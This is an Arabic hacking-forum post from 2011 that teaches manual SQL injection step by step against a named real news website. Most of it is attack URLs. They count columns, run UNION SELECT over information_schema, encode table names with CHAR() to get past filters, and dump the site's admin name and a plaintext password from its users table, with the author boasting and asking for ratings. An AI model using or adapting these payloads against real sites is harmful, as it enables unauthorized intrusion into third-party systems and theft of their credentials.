تخطي عدم ظهور الاعمدة في الحقن

khiero · 03-16-2011, 10:34 PM

كيفكم اخواني الافاضل

اليوم معانا درس بسيط
ومفهوم ومهم

في بعض الاحيان يوقف الشخص عن العمل

لكن بعد اطلاعك على درس اليوم

لن تجد صعوبة باذن الله

مثلا معانا هذا الموقع

http://www.teaminsightmag.com/news.php?id=286 order by 15

لن تجد له خطأ
فعلينا اضافة

كود PHP:

   بعد المتغير اي الرقم 286  علامة '

وبعد الرابط  23%    وهى تعنى +--+  مشفرة

الموقع الخاص اللي يشفر لنا الكلمات
http://www.waraxe.us/sql-char-encoder.html

شوفو النتيجة بدأت تظهر :surprised:

المهم الخطأ يختفي عند الرقم 11
والاستغلال يكون

http://www.teaminsightmag.com/news.p...7,8,9,10,11%23

ويصير هكذا لكن لم تظهر معانا الاعمدة ههههههههههه:gasp:
نضيف علامة - بعد علامة =

http://www.teaminsightmag.com/news.php?id=-286'+union+select+1,2,3,4,5,6,7,8,9,10,11%23

ظهرت معانا الاعمدة المصابة

ثم نضيف في العمود المصاب اي في مكان الرقم 3

group_concat(table_name)

و في اخر السطر
+from+information_schema.tables

وظهرت معانا

advertisers
articles
comments
events
manager_navigation
news_headlines
settings
sites
survey_answers
sur

طب واحد يقلى انا هاعرف فين الجدول الى هاشتغل علية من كل دول

اقول ناخد واحد واحد ونضيفة بعد +from+ ونجرب

+from+

واذا لم تفلح فلابد عليك انك تشفر الكلمات
مثلا نأخذ كلمة

advertisers تشفيرها يكون =

CONCAT(CHAR(97),CHAR(100),CHAR(118),CHAR(101),CHAR (114),CHAR(116),CHAR(105),CHAR(115),CHAR(101),CHAR (114),CHAR(115))

وهذه نضعها في مكان الرقم 3
group_concat(table_name,0x3e,column_name)

وهذه في اخر الرابط
+from+information_schema.columns+where+table_name+ like+
ونظيف لها الكلمة المشفرة

ويصير الرابط هكذا

http://www.teaminsightmag.com/news.php?id=-286%27+union+select+1,2,group_concat%28table_name, 0x3e,column_name%29,4,5,6,7,8,9,10,11++from+inform ation_schema.columns+where+table_name+like+CONCAT% 28CHAR%2897%29,CHAR%28100%29,CHAR%28118%29,CHAR%28 101%29,CHAR%28114%29,CHAR%28116%29,CHAR%28105%29,C HAR%28115%29,CHAR%28101%29,CHAR%28114%29,CHAR%2811 5%29%29%23

ظهر معانا

advertisers>id
advertisers>name
advertisers>url
advertisers>phone
advertisers>status
advertisers>site
advertisers>type

ونشوف كلمة name
ملاحظة دائما نعيد للوراء
ونضع كلمة name في مكان الرقم 3
و
+from+advertisers
في آخر الصفحة وتصير الصفحة

http://www.teaminsightmag.com/news.p...advertisers%23

ظهر معانا اسم الادمن ههههههههههههه نكمل ولا لالالالالالالالالالالا

نجرب الطريقة العادية فى الحقن ونظهر الباس

concat(column_name,0x3e,table_schema,0x3e,table_na me)
+from+information_schema.columns+where+column_name +like+char(37, 112, 97, 115, 115, 37)%23

ظهر جدول مختلف
http://www.teaminsightmag.com/news.p...15,%2037%29%23

نغير الجدول ونجرب ونشوف

http://www.teaminsightmag.com/news.p...+from+users%23

الباس طلع وهو sdfasdasd

هههههه لا تنسى .... التقييم

المصدر: :: vBspiders Professional Network ::

jo'd u]l /i,v hghul]m td hgprk